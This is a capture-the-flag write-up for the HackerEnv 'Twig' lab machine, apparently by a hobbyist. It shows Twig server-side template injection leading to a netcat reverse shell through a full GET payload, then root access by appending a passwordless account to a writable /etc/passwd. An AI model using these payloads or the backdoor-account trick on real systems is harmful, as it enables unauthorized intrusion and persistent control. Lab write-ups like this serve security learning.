HackerEnv Target: twig #3 Write Up
And I back with a new beautiful platform.
Let’s do Twig Machine in this write up.
As always, started by nmap
nmap -sT -sT -A -p- -T5

We only got one opened port! let’s explore that and dig into it

we got a form, I submitted a normal request and the form returned my name in the response.

let’s read source code to collect more information. No thing is attractive in the source code, except this comment

By googling Twig, you will understand that Twig is a Server Side Template Injection.
This vulnerability allows attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values.
Let’s try and see if I can execute or not, I will submit 4*4 and see if it will execute the multiplication and return 16 or not
I wrote {{4*4}} instead of my name

I intercepted the request by Burp Suite and sent it to the Repeater, and Bingoo 16 is there

so the vulnerability exists, let’s take advantage of it, I sent the below in the user field to know the id

let’s do a connection to explore the machine more,
I opened a listener from my machine by
nc -lvnp 8000
- 8000 is the port that I am going to listen to, you can choose any number
I connected to it by sending nc+-e+/bin/bash+ MY IP+ PORT as a user
GET /?User={{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“nc+-e+/bin/bash+”)}}&PhoneNumber=1&submit=Submit
- Put your IP and port instead of mine
After having the connection, I explored the machine by
ls -l
and found the first flag

I explored the machine and there was not anything interesting, so privilege escalation came to my mind, I went to /etc/passwd to see if I could write on it

and yess it is writeable
so now I am going to create a root account for me by
echo “nouuf::0:0:root:/root:/bin/bash” >> /etc/passwd
- nouuf is the username, you can put whatever you want instead.
after creating the account, print passwd field content to see your account by
cat /etc/passwd

so let’s switch to the ROOT account by
su nouuf
- su username
Switching was not working with me, so I decided to improve my shell to know what is going on by
python3 -c “import pty; pty.spawn(‘/bin/bash’);”
When I disconnected and connect again, privilege escalation WORKS

so listing with root privilege will give you the second flag
ls -l /root